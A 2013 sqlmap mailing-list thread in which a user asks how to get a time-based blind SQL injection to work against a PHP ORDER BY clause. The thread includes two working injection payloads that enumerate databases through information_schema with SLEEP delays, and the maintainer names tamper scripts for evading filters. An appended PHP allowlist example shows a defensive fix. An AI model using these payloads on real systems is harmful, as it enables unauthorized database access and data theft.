Re: [sqlmap-users] exp blind
From: Miroslav S. <mir...@gm...> - 2013-02-21 17:18:46
Hi.

You haven't told us anything that could help. Neither the switches/options used, nor the tamper scripts used, nothing. You are using some custom tamper script(s), as I can see "/*!50000" in the payload (we don't have this in our tamper scripts).

Nevertheless, I've tried to reproduce your run with --technique=T --tamper="between,versionedmorekeywords,ifnull2ifisnull" --dbs against our testing environment and everything works out of the box.

Kind regards,
Miroslav Stampar

On Thu, Feb 21, 2013 at 5:22 PM, Кирилл Бельков <li...@gm...> wrote:

> Hello, all.
>
> I'm trying to exploit the blind injection in the following query:
>
> $var = $_GET['var'];
> SELECT id,name FROM people ORDER BY $var
>
> sqlmap finds the vulnerability, but it cannot be used.
>
> sqlmap sends the following query:
>
> name AND 561/*!50000=*/IF((ORD(MID((/*!50000SELECT*/
> IF(ISNULL(/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
> CHAR)),CHAR(32),/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
> CHAR)) FROM /*!50000information_schema*/.SCHEMATA),1,1)) NOT BETWEEN 0 AND
> 1),SLEEP(5),561)
>
> [22:20:36] [ERROR] unable to retrieve the number of databases
>
> but it does not work. May interfere with some kind of filter.
>
> But my request in browser url:
>
> index.php?var=CASE WHEN (SELECT ASCII(SUBSTRING(schema_name, 1, 1)) FROM
> /*!50000information_schema*/.SCHEMATA limit 0,1) NOT BETWEEN 0 AND 65 THEN
> sleep(10) ELSE date END
>
> It takes a successful ... How can I get sqlmap to use my method of attack
> instead of the one it uses by default?
>
> Sincerely, Kirill
>
> p.s. sorry for my bad English

--
Miroslav Stampar
http://about.me/stamparm
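
The query quoted in this thread places `$_GET['var']` directly after `ORDER BY`, a position that takes an identifier and so cannot be protected with a bound parameter. As an added example (not code from the thread or from sqlmap), this PHP 8 script maps the request value through an allowlist before it reaches the SQL string; the helper names, the in-memory SQLite table standing in for MySQL, and the sample rows and inputs are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not code from the thread. The table contents are constructed,
// and in-memory SQLite stands in for MySQL so the script runs offline.

// Allowlist: request value => fixed SQL fragment. Only these literals can
// ever be concatenated into the ORDER BY clause.
const SORT_COLUMNS = ['id' => 'id', 'name' => 'name'];
const SORT_DIRECTIONS = ['asc' => 'ASC', 'desc' => 'DESC'];

// Hypothetical helper: map untrusted input to a safe ORDER BY clause.
function orderByClause(mixed $column, mixed $direction = null): string
{
    // Non-string input (e.g. ?var[]=x arrives as an array) is treated as absent.
    $column = is_string($column) ? strtolower(trim($column)) : '';
    $direction = is_string($direction) ? strtolower(trim($direction)) : '';
    // Exact-match lookup; anything else falls back to the default sort.
    $col = SORT_COLUMNS[$column] ?? 'id';
    $dir = SORT_DIRECTIONS[$direction] ?? 'ASC';
    return "ORDER BY $col $dir";
}

// Hypothetical helper: run the thread's query with the mapped clause and
// return the names in result order.
function listPeople(PDO $db, mixed $column, mixed $direction = null): array
{
    $sql = 'SELECT id, name FROM people ' . orderByClause($column, $direction);
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN, 1);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE people (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO people (id, name) VALUES (1, 'carol'), (2, 'alice'), (3, 'bob')");

// Constructed inputs: two valid sort keys, then values that are not column names.
$inputs = ['name', 'NAME ', 'name AND 1=1', '(SELECT 1)', ['x'], null];
foreach ($inputs as $in) {
    printf("%-16s => %-18s => %s\n", json_encode($in), orderByClause($in),
        implode(',', listPeople($db, $in)));
}
```

In a request handler the first argument would be `$_GET['var'] ?? null`; every input that is not an exact allowlist key produces the default `ORDER BY id ASC`, so no request text is ever parsed as SQL.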